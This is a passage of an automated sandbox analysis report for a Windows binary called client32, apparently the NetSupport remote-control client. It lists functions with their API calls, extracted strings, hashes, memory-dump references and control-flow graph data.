                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                    • Opcode ID: e09fb8efdfe72b90febe133e673691f75c950eaccc56677fd0a36e8ebe19b1fa
                                                                                                                                    • Instruction ID: 693d532363b182358f56b8f467711ed1d4614fd09306e8ae604ebc30339b1bb3
                                                                                                                                    • Opcode Fuzzy Hash: e09fb8efdfe72b90febe133e673691f75c950eaccc56677fd0a36e8ebe19b1fa
                                                                                                                                    • Instruction Fuzzy Hash: A0F049755A07068FF7208E75D688B62F7E9EB10759F104E28E0A6D3A90D775E444CA40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11028C10 Relevance: 40.8, APIs: 1, Strings: 22, Instructions: 542COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,72B41340,?,0000001A), ref: 11028CFD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileModuleName
                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                    • API String ID: 514040917-357498123
                                                                                                                                    • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                    • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                                    • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                    • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 256synchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                                                      • Part of subcall function 110D15C0: wvsprintfA.USER32 ref: 110D15EB
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandlewvsprintf
                                                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                    • API String ID: 137821192-1725438197
                                                                                                                                    • Opcode ID: ce604f4e0696eb9d04d8618de06a3f6b6b70cd3c5a2b9fb292cf5b6ca4d2491c
                                                                                                                                    • Instruction ID: 4f3bd53bc8d19e72287e58b17b31a22f9b89b15acabdf1a04f68b78acb210870
                                                                                                                                    • Opcode Fuzzy Hash: ce604f4e0696eb9d04d8618de06a3f6b6b70cd3c5a2b9fb292cf5b6ca4d2491c
                                                                                                                                    • Instruction Fuzzy Hash: C2919274E0020A9BDF04DBE4CD90FEEF7B5AF55308F508259E8266B284DB74B905CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11179DCB Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 610fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 1117A00E
                                                                                                                                    • CreateFileA.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 1117A047
                                                                                                                                    • GetLastError.KERNEL32 ref: 1117A06B
                                                                                                                                    • GetFileType.KERNEL32(110B8279), ref: 1117A08A
                                                                                                                                    • GetLastError.KERNEL32 ref: 1117A0AF
                                                                                                                                    • CloseHandle.KERNEL32(110B8279), ref: 1117A0C1
                                                                                                                                    • CloseHandle.KERNEL32(110B8279), ref: 1117A477
                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000003,00000001,00000000), ref: 1117A497
                                                                                                                                    • GetLastError.KERNEL32 ref: 1117A4A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                                    • String ID: @$H
                                                                                                                                    • API String ID: 352418905-104103126
                                                                                                                                    • Opcode ID: 89badeebdd5595819ac742eea5107c6198e485ca971cf935385ca17e76d8a140
                                                                                                                                    • Instruction ID: 726a0c913414c7304c8c5bd935cdf6f8764ad6e2a9e666ceeebb42dad3ad69ab
                                                                                                                                    • Opcode Fuzzy Hash: 89badeebdd5595819ac742eea5107c6198e485ca971cf935385ca17e76d8a140
                                                                                                                                    • Instruction Fuzzy Hash: 9722663290429A9FEF128FA4DD81B9DFFB1EF05358F180928E561DB390EB759944CB42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GlobalAddAtomA.KERNEL32 ref: 1115F268
                                                                                                                                    • GetLastError.KERNEL32 ref: 1115F275
                                                                                                                                    • wsprintfA.USER32 ref: 1115F288
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                    • GlobalAddAtomA.KERNEL32 ref: 1115F2CC
                                                                                                                                    • GlobalAddAtomA.KERNEL32 ref: 1115F2D9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message
                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                    • API String ID: 174411676-1728070458
                                                                                                                                    • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                                    • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                                                    • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                                    • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11175099 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 500COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: pYhv
                                                                                                                                    • API String ID: 0-1028939545
                                                                                                                                    • Opcode ID: 77037c82d7fa960f17784a5b09cf283123ea7b5f7cf35fdf299d4e1b932eafe2
                                                                                                                                    • Instruction ID: ebc76fe9083cf9377fbda788cf00ba3700e0c38dcebfd22a72c2595d8cd6b666
                                                                                                                                    • Opcode Fuzzy Hash: 77037c82d7fa960f17784a5b09cf283123ea7b5f7cf35fdf299d4e1b932eafe2
                                                                                                                                    • Instruction Fuzzy Hash: CE12D270A043C6DFEB528F64C9807AEFFF1AF02318F504599E9628B391E7B49541CB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145C70 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 175registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 899 11145c70-11145c8b 900 11145c91-11145cad GetVersionExA 899->900 901 11145e6c-11145e73 899->901 900->901 902 11145cb3-11145cba 900->902 903 11145e75-11145e85 call 11162bb7 901->903 904 11145e86-11145e91 901->904 902->901 905 11145cc0-11145ce7 RegOpenKeyExA 902->905 904->903 907 11145e93 904->907 905->901 908 11145ced-11145d5e call 11162be0 call 11143bd0 * 2 905->908 910 11145ed4-11145ee7 call 11162bb7 907->910 911 11145e95-11145ea0 907->911 927 11145d64-11145d82 call 11163ca7 call 111648ed 908->927 928 11145e5f-11145e66 RegCloseKey 908->928 911->903 914 11145ea2 911->914 914->910 917 11145ea4-11145ea9 914->917 917->910 919 11145eab-11145ec1 call 11081f20 917->919 919->903 924 11145ec3-11145ed2 call 11163ca7 919->924 924->903 924->910 934 11145d84-11145d94 call 111648ed 927->934 935 11145d96-11145d99 927->935 928->901 934->935 937 11145d9c-11145daa call 11163ca7 935->937 938 11145d9b 935->938 942 11145db0-11145dd5 call 11164ed0 937->942 943 11145e5e 937->943 938->937 942->943 946 11145ddb-11145dde 942->946 943->928 946->943 947 11145de0-11145e3c call 11143bd0 * 2 946->947 951 11145e41-11145e4c 947->951 951->943 952 11145e4e-11145e59 951->952 952->943
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExA.KERNEL32(111F1EF0,762DC740), ref: 11145CA0
                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,762DC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValueVersion
                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                    • API String ID: 2996790148-2117887902
                                                                                                                                    • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                    • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                                    • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                    • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11110DE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                                    • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                                    • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventLeaveThreadwsprintf
                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                    • API String ID: 3342958434-1024648535
                                                                                                                                    • Opcode ID: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                                                    • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                                                    • Opcode Fuzzy Hash: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                                                    • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11061320 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 289registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 990 11061320-1106134f 991 11061635-11061648 990->991 992 11061355-11061358 990->992 993 110614b4-110614bb 992->993 994 1106135e-11061366 992->994 996 110614c1-110614c5 993->996 997 11061628-11061630 call 1105ee10 993->997 994->993 995 1106136c-11061373 994->995 995->993 998 11061379-1106137d 995->998 996->997 1000 110614cb-110614cf 996->1000 997->991 998->993 1001 11061383-11061387 998->1001 1002 11061577-1106157d 1000->1002 1003 110614d5-110614e1 call 110611e0 1000->1003 1006 11061401-11061433 RegEnumValueA 1001->1006 1007 11061389-110613ac RegQueryInfoKeyA 1001->1007 1004 11061624 1002->1004 1005 11061583 1002->1005 1011 110614e6-110614ee 1003->1011 1004->997 1012 11061586-1106158f 1005->1012 1009 11061435-11061447 call 11081d30 1006->1009 1010 1106149c-110614b1 call 11163aa5 1006->1010 1013 110613c5-110613cc 1007->1013 1014 110613ae-110613c2 call 11029a70 1007->1014 1031 1106146e-1106149a RegEnumValueA 1009->1031 1032 11061449-11061456 1009->1032 1010->993 1016 11061565-1106156a 1011->1016 1017 110614f0-110614f3 1011->1017 1018 11061590-11061595 1012->1018 1021 110613e5-110613fd call 11163a11 1013->1021 1022 110613ce-110613e2 call 11029a70 1013->1022 1014->1013 1023 1106156d-11061573 1016->1023 1025 110614f5-110614fd 1017->1025 1018->1018 1026 11061597-1106159e 1018->1026 1021->1006 1022->1021 1023->1002 1025->1025 1033 110614ff 1025->1033 1034 110615b7-110615cc call 11146a90 1026->1034 1035 110615a0-110615b4 call 11029a70 1026->1035 1031->1009 1031->1010 1038 11061661-11061677 1032->1038 1039 1106145c-11061468 call 11081e70 1032->1039 1040 11061502-11061508 1033->1040 1049 110615d0-110615d8 1034->1049 1035->1034 1039->1031 1039->1038 1040->1040 1044 1106150a-11061563 call 11145bc0 call 1105ef20 call 1105fdc0 call 11162777 * 2 1040->1044 1044->1023 1049->1049 1051 110615da-110615fc call 11081d30 call 1105eed0 1049->1051 1060 110615fe-1106160a call 11081e70 1051->1060 1061 11061649-1106165e call 11162777 1051->1061 1060->1061 1069 1106160c-1106161e call 11162777 1060->1069 1061->1038 1069->1004 1069->1012
                                                                                                                                    APIs
                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,20F29797,00000000,?,00000000), ref: 110613A4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
